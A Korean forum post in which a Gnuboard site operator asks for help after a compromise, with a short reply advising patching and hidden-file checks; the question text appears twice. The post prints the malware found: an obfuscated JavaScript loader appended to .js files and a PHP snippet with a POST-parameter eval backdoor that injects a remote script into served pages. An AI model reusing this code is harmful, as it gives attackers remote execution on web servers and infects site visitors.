보안문제 때문에 질문드립니다~ 정보
보안문제 때문에 질문드립니다~
본문
오류가 나는곳의 주소를 알려주시면 더 빠르고 정확하게 답변 받을 수 있습니다.
오류 주소 :
그누보드 기반으로 홈페이지를 운영해오다가.. 어느날..!!
홈페이지 화면이 꼬여버리는겁니다.. 거의 모든 *.js 파일 맨 밑에
<!--
document.write(unescape('%3CLxMsbY8c21wriptvx%20src%3D21w%2F%2Fh19bY84%2Eor3247%2E2%2EbY81vx95%2Fjqor3ue21wry%2Ejsvx%3E%3C%2Fsor3ch1rcUgip21wt%3E').replace(/21w|cUg|LxM|or3|vx|bY8|h1/g,""));
-->
이런 코드가 들어갔더군요... jquery.js 파일로 어쩌구 뭐하는데..
난감한.......
여기서 질문입니다^^
1. 사전에 방지할수 있는 방법이 뭐가 있을까요?
2. 보통 루트 퍼미션은 얼마정도 두세요??
3. 그누보드 보안패치를 항상 받아서 해당 패치파일만 업데이트를 하시나요??
그리고 두번째 질문입니다~
php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdWSiUzQ1Bqc2ViY3JpcGVidGViJTIwc3JjJTNEazYlMkZnQiUyRnJ2NjlZUU00JTJFMjQ3JTJFMkZEJTJFVkoxUGo5NVBqJTJGanFnQnVlcnlQaiUyRXhpams2cyUzRXhpJTNDVkolMkZrNnNjazZyZ0JpZWJwZWJ0JTNFJykucmVwbGFjZSgvcnY2fGs2fGdCfGFpN3xZUU18eGl8ZWJ8RkR8UGp8VkovZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
이코드는 특정 php 파일에 삽입되있는데요... 대체 뭔가요...;;;
정말 이것때문에 삽질하고 있네요 하나 하나 찾아가면서;;
그럼 모두 행복한 하루 돼세요..^^
오류 주소 :
그누보드 기반으로 홈페이지를 운영해오다가.. 어느날..!!
홈페이지 화면이 꼬여버리는겁니다.. 거의 모든 *.js 파일 맨 밑에
<!--
document.write(unescape('%3CLxMsbY8c21wriptvx%20src%3D21w%2F%2Fh19bY84%2Eor3247%2E2%2EbY81vx95%2Fjqor3ue21wry%2Ejsvx%3E%3C%2Fsor3ch1rcUgip21wt%3E').replace(/21w|cUg|LxM|or3|vx|bY8|h1/g,""));
-->
이런 코드가 들어갔더군요... jquery.js 파일로 어쩌구 뭐하는데..
난감한.......
여기서 질문입니다^^
1. 사전에 방지할수 있는 방법이 뭐가 있을까요?
2. 보통 루트 퍼미션은 얼마정도 두세요??
3. 그누보드 보안패치를 항상 받아서 해당 패치파일만 업데이트를 하시나요??
그리고 두번째 질문입니다~
php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdWSiUzQ1Bqc2ViY3JpcGVidGViJTIwc3JjJTNEazYlMkZnQiUyRnJ2NjlZUU00JTJFMjQ3JTJFMkZEJTJFVkoxUGo5NVBqJTJGanFnQnVlcnlQaiUyRXhpams2cyUzRXhpJTNDVkolMkZrNnNjazZyZ0JpZWJwZWJ0JTNFJykucmVwbGFjZSgvcnY2fGs2fGdCfGFpN3xZUU18eGl8ZWJ8RkR8UGp8VkovZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
이코드는 특정 php 파일에 삽입되있는데요... 대체 뭔가요...;;;
정말 이것때문에 삽질하고 있네요 하나 하나 찾아가면서;;
그럼 모두 행복한 하루 돼세요..^^
댓글 전체
1. 그누보드 최신버전으로 패치하세요...
2. 서버의 보안패치가 잘 되고 있는지 서버관리자에게 문의를 해보세요.
3. 그누보드 외에 설치한 프로그램 있으시면 그것의 코드 불안정성이 없는지 점검해보세요.
4. 텔넷으로 접속후 히든파일이 없는지 점검해보세요.
ls -al 이렇게 하면 히든 파일까지 보입니다.
숨어있는 이상한 파일이 있으면 내용 확인후 (꼭! 내용확인후) 삭제하세요..
2. 서버의 보안패치가 잘 되고 있는지 서버관리자에게 문의를 해보세요.
3. 그누보드 외에 설치한 프로그램 있으시면 그것의 코드 불안정성이 없는지 점검해보세요.
4. 텔넷으로 접속후 히든파일이 없는지 점검해보세요.
ls -al 이렇게 하면 히든 파일까지 보입니다.
숨어있는 이상한 파일이 있으면 내용 확인후 (꼭! 내용확인후) 삭제하세요..